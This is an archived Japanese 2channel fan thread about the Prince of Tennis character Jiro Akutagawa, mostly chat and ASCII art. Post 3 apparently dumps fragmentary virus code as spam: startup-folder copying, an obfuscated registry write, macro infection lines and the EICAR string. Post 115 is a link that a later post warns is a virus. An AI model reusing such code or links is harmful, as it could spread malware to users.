2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【5月5日は】テニス界の眠りの王子 芥川慈郎【ジローの日】

1 :名無しかわいいよ名無し:2007/10/28(日) 22:13:06 ID:woVWj5Oy
立海の丸井ブン太の大ファン、テニスを心から楽しむジローをみんなで応援しましょう。

【テニスの王子様】芥川慈郎に萌えるスレ【眠りの国の王子様】
http://comic6.2ch.net/test/read.cgi/cchara/1123510408/

【(*-∀-)クカー】テニプリ 芥川慈郎に萌えるスレ2【(*゚∀゚)パチッ 】dat落ち
http://comic6.2ch.net/test/read.cgi/cchara/1157257950/

【ボレーなら】テニプリ芥川慈郎3度寝【誰にも負けねぇ】dat落ち
http://anime2.2ch.net/test/read.cgi/cchara/1190305973

2 :名無しかわいいよ名無し:2007/10/28(日) 22:15:41 ID:woVWj5Oy
ごめんナンバー入れるの忘れた・・・吊ってくる

【5月5日は】テニス界の眠りの王子 芥川慈郎4【ジローの日】


3 :名無しかわいいよ名無し:2007/10/29(月) 00:16:56 ID:QEGdEiBq
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :名無しかわいいよ名無し:2007/10/29(月) 03:10:31 ID:CkNTuaZl
>>1乙!

でもスレ消化してないから実質2スレ目だよね?

落ちないように愛でていきましょう〜

5 :名無しかわいいよ名無し:2007/10/29(月) 06:25:18 ID:PJJXOeMh
落とさないためには最終レスより8時間以内の書き込みを要するらしい。
新スレ記念にポッキーおいていきますね
―━━

6 :名無しかわいいよ名無し:2007/10/29(月) 06:30:51 ID:rtnhbzPv
>>1乙!

ついでに再掲しときますね

721: 2007/10/10(水) 00:57:23 ID:YzW42VrO[sage]
(+゚д゚)殺伐としたスレにポッキーが!!
      ━━━─

(*゚∀゚)美味ぇ!
      ────

(+゚д゚)チョコだけなめんなよ!!

7 :名無しかわいいよ名無し:2007/10/29(月) 08:06:17 ID:DEnNo82d
前日書き込みあったのに落ちた時はびっくりしたよ
8時間か…頑張って保守ろうな

8 :名無しかわいいよ名無し:2007/10/29(月) 15:56:59 ID:DEnNo82d
よしあげよう

ジローかわいいよジローかっこいい

9 :名無しかわいいよ名無し:2007/10/29(月) 19:49:47 ID:lq9Pb0KS
5月5日はこどもじろうの日

                 (◎)
                 / ___
                   /| ◎ 《,《,《,《,《,《,《,《,《/Σ
               /\|  ノミ《,《,《,《,《,《,《,《,《\Σ
           ∧∧ /    ̄ ̄ ̄
           (゚∀゚*)/   うれC〜♪
          ⊂  つ≡=-
           と,, )〜≡=-
             ヽ)≡=-


今度は1000いくようがんばりましょう

10 :名無しかわいいよ名無し:2007/10/30(火) 00:42:56 ID:o3oTcnok
>>1乙!
8時間って・・・



11 :名無しかわいいよ名無し:2007/10/30(火) 08:07:37 ID:JPE56j2q
>>9
おおかわゆすw

そういえば初期スレの頃はAA職人さんが頑張ってくれてたなぁ

12 :名無しかわいいよ名無し:2007/10/30(火) 10:00:20 ID:98VrEDvI
新スレ記念に丸井くんを置いていきますね
    
    /ハ           
   ノ"⌒`丶   
   ソ 从 从 
   W ・ω・)  
  {  U Ul
   ヾ.,____,ノ



13 :ぴか:2007/10/30(火) 15:49:10 ID:yHwRofnM
>>12
カワユスvv


14 :名無しかわいいよ名無し:2007/10/30(火) 22:58:24 ID:ZzFaN7Ep
>>11
ホント髪の毛つけたかったんだけど、ジローちゃんの髪型分からなかったからw
1つでもあれば加工できるんだけどAAが1つも見つからないorz

15 :名無しかわいいよ名無し:2007/10/31(水) 01:14:02 ID:sfj5OB39
(*゚∀゚)つ─━━━
みんなにあげるC!!

16 :名無しかわいいよ名無し:2007/10/31(水) 01:37:58 ID:IW6UpMz/
>>15

サンキュー!俺も芥川にお菓子やるよ

        ッパ
   ノ"⌒`丶   
   ソ 从 从 ■    
   W ・ω・)丿 

17 :名無しかわいいよ名無し:2007/10/31(水) 17:54:31 ID:Ar7xZK8x
ボレー得意な二人組は本当に可愛いな

18 :名無しかわいいよ名無し:2007/11/01(木) 00:44:19 ID:qgAQ5/sc
100キロマラソンにうえだ氏は来るだろうか…
ソロと3グァバ、是非聴きたい

19 :名無しかわいいよ名無し:2007/11/01(木) 00:58:16 ID:Ak9Z65Qz
>>18
100『曲』ねwww
まあ投票上位にいたら可能性は高いけど…どうだろう?

20 :名無しかわいいよ名無し:2007/11/01(木) 13:04:21 ID:gRrGHR+7
100キロワロタwwwww

正直上位でもうえだ氏は出ない気がする…

21 :名無しかわいいよ名無し:2007/11/02(金) 00:24:48 ID:mpxV3qo6
間違った…!恥ずかC

100曲マラソンに来るのはテニプリトークが出来る人の可能性が高いよね
ラジオ聴く限りではやっぱ難しいよなw

22 :名無しかわいいよ名無し:2007/11/02(金) 21:12:39 ID:z2BeowoV
わざと100キロにしたのかと思ったw

うえださんは高確率で来ない気がするw
来てくれたら是非とも行きたいけど・・・

23 :名無しかわいいよ名無し:2007/11/03(土) 00:16:01 ID:E+EO0M+D
慈郎の声がうえださんで本当に良かったよ
「C!」とか「すっげーっ!」とかいびきとか、本当可愛すぎてたまらんw
イベントは無理でも、またCDとかアニメに出てきてくれれば幸せだ

24 :名無しかわいいよ名無し:2007/11/03(土) 14:41:02 ID:/uRdxp96
ゲーム総合スレよりコピペ・DS版情報

>判明したキャラは立海全員、氷帝全国で青学と当たった7人、比嘉木手

orz

25 :名無しかわいいよ名無し:2007/11/03(土) 15:33:27 ID:NYhPgM/B
>>24
オレタチ\(^O^)/オワタ

26 :名無しかわいいよ名無し:2007/11/03(土) 17:03:04 ID:BY8P0RWC
(*゚∀゚)…

27 :名無しかわいいよ名無し:2007/11/03(土) 17:29:11 ID:r6Zl0XfT
555

28 :名無しかわいいよ名無し:2007/11/03(土) 21:12:38 ID:VZ3z19pv
慈郎も甲斐くんもいないなんてw

…orz

29 :名無しかわいいよ名無し:2007/11/03(土) 21:52:50 ID:Lxh56q4x
>>28
>慈郎も甲斐くんもいないなんてw
ふわふわヘアーマニアめw


自分もorz
でもその後「通信やらでジローや千石でるんじゃね?」って雰囲気になってるようですが

30 :名無しかわいいよ名無し:2007/11/04(日) 01:20:23 ID:ufuv/wpk
こまめにあげ。

31 :名無しかわいいよ名無し:2007/11/04(日) 08:34:41 ID:J0ISabMC
パッションレッドでも隠しキャラだったし、今回もそうだと信じたい…
テニスのゲームはどれも面白いけど、やっぱ一番好きな慈郎がいなきゃなあ
ていうか千石さんもリストにいないとは驚き

32 :名無しかわいいよ名無し:2007/11/04(日) 12:55:06 ID:TeM/S1UN
せっかくキャラクター増えたのに、削ったらもったいないよ

33 :名無しかわいいよ名無し:2007/11/05(月) 01:02:15 ID:3ilrRwkO
そういえばスレタイって作品名入ってなきゃだめなはずだけど
これは「テニス」って入ってるからいいのかな?

34 :名無しかわいいよ名無し:2007/11/05(月) 01:13:22 ID:WhfddiG4
>>33
多分いくない
次はちゃんと入れたほうがいい

35 :名無しかわいいよ名無し:2007/11/05(月) 01:13:33 ID:jPkPXDSd
いいんじゃない?
検索避けでいれてないスレもあるし。
できればテニプリって入ってるのがいいけどね、なんとなく。
次スレまで落ちないで〜慈郎

36 :名無しかわいいよ名無し:2007/11/05(月) 22:25:03 ID:JYgiPGCu
スレ立てした者ですが普通に忘れてました。申し訳ない

37 :名無しかわいいよ名無し:2007/11/06(火) 00:04:01 ID:sd+Rjd+7
>>36
次から気をつければいいさ
良いスレタイをありがとう

慈郎て身長は160だけどこれから伸びるんだろうか
最終的には170前半になるのが理想だなぁ

38 :名無しかわいいよ名無し:2007/11/06(火) 01:34:59 ID:rJV1KfB0
ずっと小さいままでも可愛いけど、きっと大きくなるだろうね。
寝る子は育つと言うし。寝過ぎる子だから育ちすぎるかもしれない。

39 :名無しかわいいよ名無し:2007/11/06(火) 01:56:57 ID:W/g9RK+1
まだ中学生だから伸びるよ絶対。
よく寝てよく運動してるし。

40 :名無しかわいいよ名無し:2007/11/06(火) 02:30:59 ID:ILhttGxQ
個人的にはちっちゃいまま希望
伸び悩んでいる事にコンプレックスを抱いてると良い

どうしても背を伸ばしたいが為に
躍起になって牛乳をがぶ飲みする慈郎を想像して萌えた

41 :名無しかわいいよ名無し:2007/11/06(火) 18:04:40 ID:uUp4gZgm
急激な成長期を迎えるとかなり眠くなるらしいよ
うちの弟(リアル中3)が一年で160ちょい→180にニョキニョキ伸びた

42 :名無しかわいいよ名無し:2007/11/06(火) 20:46:55 ID:Z/a5Wyst
>>41
SUGEEEE
慈郎がそんなでかくなったら「トトト」って足音は「ドスンドスン」になるなw

43 :名無しかわいいよ名無し:2007/11/07(水) 02:20:11 ID:XMhgVfUJ
もう樺地おんぶできなくなっちゃうwww

44 :名無しかわいいよ名無し:2007/11/07(水) 03:25:16 ID:zkD4/lRu
40.5巻でジローの新しいプロフィールが見れる事を期待

45 :名無しかわいいよ名無し:2007/11/07(水) 03:26:47 ID:cnLneqKh
樺地も2m越えてるだろうから出来るよ

46 :名無しかわいいよ名無し:2007/11/07(水) 12:57:20 ID:MGK4r6vU
さすがだな樺地
小さいままのほうが可愛いだろうけど、
180センチの男が猫みたく丸まって寝てるのを想像すると萌える

47 :名無しかわいいよ名無し:2007/11/07(水) 16:36:11 ID:PQWrTLMc
20.5巻のプロフの好きなタイプの項目、
赤也が「明るい子がいいっス!」って言ってたのにときめいたからw、
40.5巻に載るプロフはどれか一つでいいからインタビュー形式だといいなぁ
慈郎の言葉で好きなものとか答えてほしい(´Д`*)

48 :名無しかわいいよ名無し:2007/11/07(水) 17:34:43 ID:svOIcjrS
>>47
公式(ゲーム含む)で台詞で返してるのって観月・亜久津・南次郎・切原だっけ

でもジローの台詞返しだと寝そうだwww

49 :名無しかわいいよ名無し:2007/11/07(水) 19:49:44 ID:3bTa6uKG
>>48
真田も何か言ってたw

次の試合ブン太だったらジロー出ないかな
前の試合は寝てたっぽいけどw

50 :名無しかわいいよ名無し:2007/11/08(木) 20:21:20 ID:FsZniFV7
>>46
それいいな!
小さかった男の子が大きく成長する(でも中身は相変わらずなのでアンバランスな感じ)
過程を見てみたい。
(*゚∀゚) ついでにあげてみるyo!

51 :名無しかわいいよ名無し:2007/11/09(金) 00:37:59 ID:d8xqUOcq
羊好きなんだっけ?

52 :名無しかわいいよ名無し:2007/11/09(金) 07:19:37 ID:KQ2iWXpR
好きな食べ物が羊
ラム肉や羊の肉じゃなくて羊
なんかフワフワの羊見る度にうまそーと思ってそうな感じだよね

53 :名無しかわいいよ名無し:2007/11/09(金) 12:54:05 ID:yPHDPMZI
ビジュアルイメージもなんとなく羊と似合うような気がする。
羊の大群の上で昼寝してるような。

54 :名無しかわいいよ名無し:2007/11/09(金) 20:56:34 ID:ttwZz5s9
>>53
>羊の大群の上で昼寝してるような。
それなんて太上老君?

覚醒くんで起こさないといつまでも寝るのか

55 :名無しかわいいよ名無し:2007/11/10(土) 12:40:42 ID:NecIFAhm
頭が羊みたいにほわほわだから、羊好きっていうのが可愛くて仕方ない

56 :名無しかわいいよ名無し:2007/11/11(日) 17:21:05 ID:8tPnl6nn
>>52
わたあめ的なうまそーなのかなw

57 :名無しかわいいよ名無し:2007/11/11(日) 21:19:25 ID:Bz7Dcudw
忘れてたー今日はポッキーの日じゃないか
ジロスレ的には立派な記念日ですよ

58 :名無しかわいいよ名無し:2007/11/11(日) 22:02:46 ID:4uUyKe9N
>>57
(*゚∀゚)つ─━━━
今日はポッキーの日だから、スレのみんなにあげるC!!

59 :名無しかわいいよ名無し:2007/11/11(日) 22:34:38 ID:xoWIdesh
ポッキーのついでにジローもいただきますねノシ

60 :名無しかわいいよ名無し:2007/11/11(日) 23:21:21 ID:UXPD5ZeF
>>59
そうはさせない

秋冬はムースポッキー類の新作出るから慈郎にはうれしい季節だね

61 :名無しかわいいよ名無し:2007/11/12(月) 01:37:35 ID:lSo25eR6
ジローちゃんポッキーいっぱいもらってそw

62 :名無しかわいいよ名無し:2007/11/12(月) 06:01:06 ID:yaVq2KEv
ムースポッキーじゃなくてポッキーデコレで悪いんだけど、
レモン何とか?だったか薄黄色の奴あったじゃないか
あれ、色とデコレのもしゃもしゃ感で見る度ジロを思い出した

63 :名無しかわいいよ名無し:2007/11/12(月) 23:26:51 ID:5za4uMxE
>>62
うお、それはジローっぽいなw
明日帰りに買ってみよう

64 :名無しかわいいよ名無し:2007/11/13(火) 00:16:10 ID:ccxgCbMS
>>63
62だけどごめん、今調べたら「ポッキーデコレ レモンのフロマージュ」で
去年春の限定商品だった…(´・ω・`)
写真載せてるブログがあったのでぐぐってみて

65 :名無しかわいいよ名無し:2007/11/13(火) 01:05:35 ID:fwV0jm78
こんな素晴らしいスレがあったなんて・・・
もっと早く気づけばよかったorz

66 :名無しかわいいよ名無し:2007/11/13(火) 08:48:21 ID:Eo2b7Nv9
宍戸のスレより

944 名前: 名無しかわいいよ名無し [sage] 投稿日: 2007/11/12(月) 19:32:04 ID:xffWZgGt
「Hになればなるほど固くなるものちーんぽ?(*-∀-)」
「えんぴ…はっ?!Σ(゚д゚ )」
「…(*゚∀゚)パチッ」
「…(+゚д゚;)」
「ちーんぽ?(*゚∀゚)」
「(えぇー…)0o(;+゚д゚)」

ジローかわいいよジロー

67 :名無しかわいいよ名無し:2007/11/13(火) 10:19:27 ID:wdW6u7fJ
>>64
63だけど、わざわざありがとう。ぐぐってみるよノシ

>>66
わろす
宍戸スレのジローは下ネタ大王だなw

68 :名無しかわいいよ名無し:2007/11/14(水) 00:02:11 ID:gXNhwE/e
アニメのジローもかわいいけど、やっぱ原作の金髪ふわふわが最高だよなぁ
OVAでは慈郎と跡部の髪色直るかなーと思ってたけどそのままだったね

69 :名無しかわいいよ名無し:2007/11/14(水) 00:15:05 ID:lrffiWdN
だね
ジャージの線とまるぽっちも結局ないままだったw


70 :名無しかわいいよ名無し:2007/11/15(木) 03:47:30 ID:wirNPTyi
落ちたら嫌なんでage

71 :名無しかわいいよ名無し:2007/11/16(金) 00:57:23 ID:zXF4Uppo
ジローの髪(原作)おしゃれで可愛いなあ〜
古着系とか似合いそう

72 :名無しかわいいよ名無し:2007/11/16(金) 16:09:39 ID:jFiHuEwD
古着系同意!
ジローはきっとおしゃれさんだよね
あと、いろんな説があるけど髪色は地毛じゃない方が個人的に好き

73 :名無しかわいいよ名無し:2007/11/17(土) 04:30:49 ID:xrb7h7ap
おしゃれなリュックやスニーカーいくつも持ってそうだ

74 :名無しかわいいよ名無し:2007/11/17(土) 07:06:50 ID:a1J7gLxC
アニメ版の髪色嫌いな人多いの?
自分はむしろミルクティーっぽいと言うか、茶系の中でも優しい感じの
色合いなのが好みなんだが…
でも(*゚∀゚)なら何でもオッケーだよね!

75 :名無しかわいいよ名無し:2007/11/17(土) 12:42:38 ID:k4szD/ns
>>74
アニメ版慈郎は髪色云々よりも雰囲気がちょっとなぁ
髪質は硬そうだし、目はつっててキツイ印象
たしけ慈郎特有の、ふわふわした可愛さが損なわれてるような

アニメ版慈郎好きな人には申し訳ないけど
自分はそう感じる

76 :名無しかわいいよ名無し:2007/11/17(土) 12:42:42 ID:lsKx/zza
>>72
ゲームではなんかビローンとヒモの出た変な服着てたけどねw
あれはあれで可愛かった…

77 :名無しかわいいよ名無し:2007/11/17(土) 14:23:28 ID:kfCjJ866
>>75
アニメの慈朗の髪型も気になったけど(でも好き)
なにより作画がいつも目が死んでるのが気になったw
眠そうにしてるのを表してそうなってるのかただ単に失敗してそうなったのか分からないけど

ジロちゃんっていつもリュックサック背負ってるのがかわいい。
なんか慈朗らしくて似合ってるw

78 :名無しかわいいよ名無し:2007/11/17(土) 15:28:07 ID:RcfEHpVO
>>77
×慈朗
○慈郎

79 :名無しかわいいよ名無し:2007/11/17(土) 21:45:12 ID:I72zT/9Z

      _y-ォッuキ
     /厂   "`‐┤_
   _ィ厂        乙
  -xト          f一'''''''"‐┴ニ=-‐''llョョョョョ_
           :广           lllllllllllllllllllllョョョ广ヽ、
   み_..っy    ....ゝ            ゙lllllllllllllllllllllllllllllョr‐――‐‐、
   j(_厶    rく ̄             llllllllllllllllllllllllllllll 、    ノ
  / `''''']ニィ'ゝ〉 ゙ゝ、_    __..........__..jlllllllllllllllllllllllllllテ冖――''´
  〔    ′ `  `′  ` ゙゙̄"´      ,llllll手テ~~⌒
  ゙''''''''''''‐――‐‐‐‐‐‐‐‐―――---..../

おやすみなさい

80 :名無しかわいいよ名無し:2007/11/17(土) 22:32:29 ID:ulmz7mDE
        ,,r"`⌒))ヽ    /
        (  ノ 人') )  < スッゲー!ワクワクしてきたー!
         "J*゜ー`ノ    \__________
         (つuuノつ 〇))

      ,r"`⌒)ヽ,      
      (  ノ 人ツ)
    ∩_"J*´ ー´ノ´
  ⊂(ミ|__つ_ ノつ ..((〇

    ,,r"`⌒))ヽ、   
    (  ノ人 ') )    >>219
    "J*‘ o‘ノ´ /  本戦ではよろしくね?
      (つ■ ]つ    
      √__|
      U  U

     ,,r"`⌒))ヽ   
     (  ノ人 ') )   
     "J*゜∀゜ノ´  
     ⊂||| ↑ 〕つ   
       √_ |     AAズレた…orz   
      ,ソ  U  

 o    _,,,,_ o            ゜ 
     /,,,,,,,,,,,,\   ゜   o
   ,/ ,/,,_,,,,...,,,_.,,,〕         O 
  O〜 (  ノ人 ') ) 。         。
     "J*‘ v‘ノ´    c33、
。   O  (つ■O    て’ノЭ´ 6
       √__|    (゛  `⌒)
    。  U  U      `U`  U´

       ,,r"`⌒))ヽ、   
       (  ノ人 ') ) 
       "J*‘∀‘ノ´
       __(つ=||| と
      /\ ̄[三/ ̄ ̄\
     .<\○\_______\
      .ヽ\ ○。 o○ 。O` 、
        \`ー――――――ヘ
          ̄  ̄ ̄  ̄ ̄  ̄ ̄

     ,,r"`⌒))ヽ    /
     (  ノ人 ') )   <  謹 賀 新 年
     "J*゜∀゜ノ´   \_______ 
       ハV/ヘ
      / ゜=@=゜ \  
     | 「「「「「|  」
      |」」」」」」 ̄
       ⊇⊇

       ,,r"`⌒))ヽ、   / 
    〃∩(  ノ人 ') )  <  17巻で長太郎に暴露されたー
    ⊂f⌒"J*‘ v‘ノ`   \____________
      `ヽ_ミつ⌒/⌒c    
          ⌒ ⌒´

81 :名無しかわいいよ名無し:2007/11/17(土) 22:34:11 ID:ulmz7mDE
       ,,r"`⌒))ヽ、   
       (  ノ人 ') )
       /´J*´∀`ノ´
      /\ ̄ ̄ ̄旦 ̄\
     .<\○\_______\
      .ヽ\ ○。 o○ 。O` 、
        \`ー――――――ヘ

          ̄  ̄ ̄  ̄ ̄  ̄ ̄
 ■■■ ■  ,r"`⌒))ヽ、■■■  ■■
   ■  ■ (  ノ人 ') ) ■  ■ ■ ■
   ■  ■ "J*‘∀‘ノ´ ■■   ■  ■ ■■■■■■■
   ■  ■  《⌒]つつ━(田)■ ■ ■ 
 ■■   ■  √__|  ■   ■ ■■ 
           U (/
     ______________________
   /________\
   「             |
   |  ___    *  /)  |
   | 『__))      //  |
   |  || OCKY  /"/   |
   |       / /    |
   | ムースポッキー   |        / 
   |      / /     |"`⌒))ヽ、 <  今日はホワイト(シロ)デイ
   |     ./ /. *    | ノ人 ') )   \_____________ 
   |    / /    * |J*゜∀゜ノ´
   |  */ /       |⊂[ ノ
   |*   ''''   26packs |___」
   |_________|U/

       ,,r"`⌒))ヽ 慎ましやかな>>389
       (  ノ人 ') )  届け、ホワイトポッキー
       "J*゜∀゜ノ´
        (つ と彡 / シュッ
        「/// /   シュッ
        / □/
      /□  /
     /□ / /
   /    □./

     ,,r"`⌒))ヽ、   < 今日はオレンジデイ!
     (  ノ人 ') )    \_________
     "J*‘ o‘ノ´ /   c33、
       (つ■ ]つ   て’ノЭ´ 6
       √__|    (゛  `⌒)
       U  U      `U`  U´

82 :名無しかわいいよ名無し:2007/11/17(土) 22:35:53 ID:ulmz7mDE
  >▽< 
 ( ● )
  >△<  ___________________
   || /|| ⌒  3) )  ))  ))))〕 〕  二/
   ||<  || ●)) 3 ≡\)  ) ))))〕 〕 二<
   || \|| ~~  3)  ̄)  )  ))))〕 〕  二\
   ||    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ||       |L」|      || ̄))
   ||       |「T| APPY  .|「 ̄)) IRTHDAY 
   ||                 ̄´´ ____    .__
   ||                    . ̄|「    || 
   ||                    __」| IRO  V
   ||                     ̄´     0
   ||      ¥/|\¥
   ||      ∠∠\_\
   ||     (  ノ人 ') )
   ||     "J*゜∀゜ノ´
   ||     ⊂||| ↑ 〕つ
   ||       √_ | 
   ||       (/  U

       ,,r"`⌒))ヽ     /
       (  ノ人 ') )   <   じーろうじろう、たっぷりじろうー♪
       "J*‘ o‘ノ´    \__________
       i=O==O、
       | ⌒  ヾ|
       、 ●))  .|
       |uuuuUUU.|
       | U U U|
    _____|U U U |
 ((  \\ | U U U/ =3
      \〜ー――´

            ┏━┓
            ┃祝┃
            ┃*┃
            ┃C┃
            ┃D┃
            ┃出┃
            ┃演┃
      ,,r"`⌒))ヽ┗━┛
      (  ノ人 ') ) ノ'
      "J*・∀・ノ"ノ
       ||| つ ]つノ
       √_ | ∫
       ,ソ U "



いきなりごめん
過去スレの慈郎AAまとめてみた。行数節約のためAAのみだけど

>>79の慈郎もかわいいなあw

83 :名無しかわいいよ名無し:2007/11/17(土) 23:30:29 ID:I/9OpHiH
>>82
ありがとう
ジローちゃんが好きすぎて勢いで作った

84 :名無しかわいいよ名無し:2007/11/17(土) 23:52:58 ID:oF6TxUtY
ジロAA懐かしい

>>83
AA作れるの凄いなあ

85 :名無しかわいいよ名無し:2007/11/18(日) 00:21:18 ID:D66ArAj2
>>79-82
乙&d
ぜひ次スレのテンプレに加えよう

それにしても>>79さんAA作るの上手いね。

86 :名無しかわいいよ名無し:2007/11/18(日) 10:02:55 ID:8o5svBTy
仁王スレよりID後半が羨ましいのでコピペしてきた

135: 2007/11/17(土) 15:09:50 ID:Xi/kjiro[sage]
それが人への物の頼み方かー!

87 :名無しかわいいよ名無し:2007/11/18(日) 21:00:55 ID:sFrDTaFc
age
ジローはもらっていきますね。

88 :名無しかわいいよ名無し:2007/11/18(日) 21:07:38 ID:UPxJmGnW
>>86
おおおすげっ!
是非こっちにも来てほしかったw

89 :名無しかわいいよ名無し:2007/11/18(日) 21:43:54 ID:d1RNo2Te
>>88
ちょ、おま、阻止はいいのかwww

>>87
明日7時になったら ち ゃ ん と 起 こ し て
朝飯食わせて氷帝の校門まで送っていくよーに

90 :名無しかわいいよ名無し:2007/11/19(月) 09:09:53 ID:d1tTUXtN
100曲マラソンやっぱりうえだ氏いなかった…orz

91 :名無しかわいいよ名無し:2007/11/19(月) 10:44:08 ID:hIPhd2d+
やっぱなぁ。歌のイベントだから仕方ない。

92 :名無しかわいいよ名無し:2007/11/19(月) 12:40:00 ID:V6HaDiEb
中の人こういうイベントあまり好きじゃないんだっけ?
仕方ないとはいえジローも参加して欲しかった

93 :名無しかわいいよ名無し:2007/11/19(月) 17:14:40 ID:cE3M5xNG
曲出してるのに当然のごとくスルーされた城西湘南ファンでもある自分はWで悲しい…

アレだよ。小野坂さんがいる所にうえださんいると2人でブレイカー本領発揮しちゃうからだよ

94 :名無しかわいいよ名無し:2007/11/19(月) 19:38:59 ID:cAJGYW7i
>>92
イベントというか・・・
まぁ今年は自分のイベントしか出てなかったから来ないとは思ってたけどやっぱがっくり
せめてラジプリにまた出て欲しいなぁ

95 :名無しかわいいよ名無し:2007/11/19(月) 23:52:57 ID:JJVqkdwr
うえださんの歌聞きたかったのになぁ…
DSのゲームにも出ないしがっくりだーー
ジローをもっと愛してほしいなーと思ってしまう

96 :名無しかわいいよ名無し:2007/11/20(火) 00:02:01 ID:YjfLM3o8
>>95
ゲーム参加が無いのはKO○AMIのせい
或いは全国に出してくれなかったたしけのせい
でも、まだ隠れキャラの可能性もあるよ
そしてイベ参加が無いのは中の人ヲタ嫌いという噂あり
常識の無い一部のヲタだか一人のヲタだかに住所を晒されたことがあるとか

何が言いたいかと言うと中の人ジローを愛してないわけじゃないと思うよ

97 :名無しかわいいよ名無し:2007/11/20(火) 00:44:24 ID:WBV2FBfa
この流れを見てちょっと悲しくなった……

98 :名無しかわいいよ名無し:2007/11/20(火) 00:48:33 ID:MPNc5Sku
まぁ〜〜しょうがないさっ
次のゲームかラジプリに出ることを期待してるよ

99 :名無しかわいいよ名無し:2007/11/21(水) 09:57:57 ID:ARI7ejuD
スマヒの慈郎の「うっしゅ!」が好きw

100 :名無しかわいいよ名無し:2007/11/21(水) 22:37:44 ID:WURhL+Kb
(*゚∀゚)>>100だC!

101 :名無しかわいいよ名無し:2007/11/22(木) 19:37:19 ID:sxcaIRk/
ジローは…やっぱ可愛いよ…!

102 :名無しかわいいよ名無し:2007/11/23(金) 01:28:15 ID:ysFdbCxK
ジロスレって1000近くはいっても1000に到達したことはないんだな
このスレでは1000目指したい。ということでage

慈郎はやっぱ可愛い部類なんだろうけど、かっこいいところはどこだろう
個人的には不二の「彼は狙って打ってる!」のあたり
一見まぐれっぽいのに実は計算通りだったってのが
すげぇカコイイ!と思ったw

103 :名無しかわいいよ名無し:2007/11/23(金) 17:43:48 ID:kNSLsGeQ
ボレーなら誰にも負けねぇ!!
はかっこEー!!!!

104 :名無しかわいいよ名無し:2007/11/23(金) 19:19:38 ID:XgSyATBG
覚醒が可愛いよ〜

105 :名無しかわいいよ名無し:2007/11/23(金) 20:27:04 ID:kDJkxKOr
>>102
>ジロスレって1000近くはいっても1000に到達したことはないんだな

きっとジローの影響でスレ自体も住人も眠くなってしまうのさ♪

あと不二が言ってた狙って打ってるってシーン同感。
一応考えてるのねwと思った。

106 :名無しかわいいよ名無し:2007/11/23(金) 22:55:48 ID:peMNZtCq
ジローはワープしたり戻ったりするからスレが進まないんだよ

107 :名無しかわいいよ名無し:2007/11/25(日) 02:13:59 ID:umstCJ3d
40.5の書き下ろしは跡部メインみたいだね
イラストなのか漫画なのかよくわからないけど、
漫画だったら氷帝の2年前の入学式が描かれるわけだ
色々思うところはあるけど、慈郎の2年前の姿を見られるのは純粋に嬉しいしwktkだ!
同時に、是非他のページでは他の学校にもスポットを当ててくれと思うな
期待してるよたしけ〜

108 :名無しかわいいよ名無し:2007/11/25(日) 02:23:56 ID:umstCJ3d
ああっていうかごめん、ここバレは良いんだっけ?
本編のバレはNGで、それ以外の情報はOKって勝手に認識してるんだけど、駄目だったらすまない

109 :名無しかわいいよ名無し:2007/11/25(日) 04:10:11 ID:7EbJc9jW
>>108
情報も発売日まで待つべきだと思う。それもネタバレだからね。


(*゚∀゚)次から気を付ければいいC!

110 :名無しかわいいよ名無し:2007/11/25(日) 12:33:03 ID:yUm5YNFR
あぁもう今から40.5楽しみだなー!

111 :名無しかわいいよ名無し:2007/11/25(日) 15:29:07 ID:umstCJ3d
>>109
了解した!ごめんな〜次から気をつける

112 :名無しかわいいよ名無し:2007/11/25(日) 16:58:48 ID:u7c2JOsk
ジローは天使

113 :名無しかわいいよ名無し:2007/11/26(月) 01:33:15 ID:+jkMyaq8
可愛いから弟に…と思うけど、逆にお兄ちゃんでもいいと思った。
遊んでくれそうだよね。
しょうもないことでも一緒に盛り上がってくれそう。

114 :名無しかわいいよ名無し:2007/11/26(月) 18:28:33 ID:LrUN+h1i
いつまでも寝てる慈郎を必死に起こす妹とかかわいいな〜
最終的に諦めて一緒に寝ちゃったら萌え

115 :名無しかわいいよ名無し:2007/11/26(月) 18:32:14 ID:6BrBzSxM
http://kissho.xii.jp/1/src/1jyou20251.avi

116 :名無しかわいいよ名無し:2007/11/26(月) 19:44:53 ID:9hYijShC
ジローの兄弟がどんな感じか想像つかない…

117 :名無しかわいいよ名無し:2007/11/26(月) 21:03:29 ID:YJfsS4LY
115はウィルスです注意

118 :名無しかわいいよ名無し:2007/11/26(月) 21:51:02 ID:Lsk/uopr
妹は幼子がいい。兄は高2ぐらいがいい。

119 :名無しかわいいよ名無し:2007/11/27(火) 01:57:10 ID:We6FlYDB
なんとなく、見た目は似てないほうが萌える

120 :名無しかわいいよ名無し:2007/11/27(火) 23:38:53 ID:ff0WHrn8
40.5巻早くでないかな。
ジロー見たいよジロー

121 :名無しかわいいよ名無し:2007/11/28(水) 00:03:30 ID:u2wJXbV2
おやすみジロー

122 :名無しかわいいよ名無し:2007/11/28(水) 02:15:45 ID:VxZZAMU3
敵でも、技が凄いと思ったら素直に驚いて喜んだり尊敬したりする所が好き

123 :名無しかわいいよ名無し:2007/11/29(木) 01:07:39 ID:OsjkVOkR
うん、見ていて気持ち良い

124 :名無しかわいいよ名無し:2007/11/29(木) 22:32:35 ID:/obawZKL
勝手な願望だが、妹は何となく「子」のつく名前であってほしい。
